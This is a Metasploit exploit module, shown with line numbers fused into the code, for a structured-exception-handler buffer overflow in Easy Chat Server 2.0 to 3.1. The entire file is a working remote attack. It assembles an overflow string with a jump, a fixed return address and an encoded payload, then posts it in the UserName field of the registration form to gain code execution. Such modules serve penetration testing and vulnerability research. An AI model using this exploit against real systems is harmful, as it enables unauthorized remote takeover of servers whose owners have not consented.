Path: blob/master/modules/exploits/windows/http/easychatserver_seh.rb
19569 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote67Rank = NormalRanking89include Msf::Exploit::Remote::HttpClient1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Easy Chat Server User Registeration Buffer Overflow (SEH)',16'Description' => %q{17This module exploits a buffer overflow during user registration in Easy Chat Server software.18},19'Author' => [20'Marco Rivoli', # Metasploit21'Aitezaz Mohsin' # POC22],23'License' => MSF_LICENSE,24'References' => [25[ 'EDB', '42155' ],26],27'Privileged' => true,28'Payload' => {29'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",30},31'Platform' => 'win',32'Targets' => [33[ 'Easy Chat Server 2.0 to 3.1', { 'Ret' => 0x100104bc } ],34],35'DefaultOptions' => {36'RPORT' => 80,37'EXITFUNC' => 'thread',38'ENCODER' => 'x86/alpha_mixed'39},40'DisclosureDate' => '2017-10-09',41'DefaultTarget' => 0,42'Notes' => {43'Reliability' => UNKNOWN_RELIABILITY,44'Stability' => UNKNOWN_STABILITY,45'SideEffects' => UNKNOWN_SIDE_EFFECTS46}47)48)49end5051def exploit52sploit = rand_text_alpha_upper(217)53sploit << "\xeb\x06\x90\x90"54sploit << [target.ret].pack('V')55sploit << payload.encoded56sploit << rand_text_alpha_upper(200)5758res = send_request_cgi({59'uri' => normalize_uri(URI, 'registresult.htm'),60'method' => 'POST',61'vars_post' => {62'UserName' => sploit,63'Password' => 'test',64'Password1' => 'test',65'Sex' => 1,66'Email' => 'x@',67'Icon' => 'x.gif',68'Resume' => 'xxxx',69'cw' => 1,70'RoomID' => 4,71'RepUserName' => 'admin',72'submit1' => 'Register'73}74})75handler76end77end787980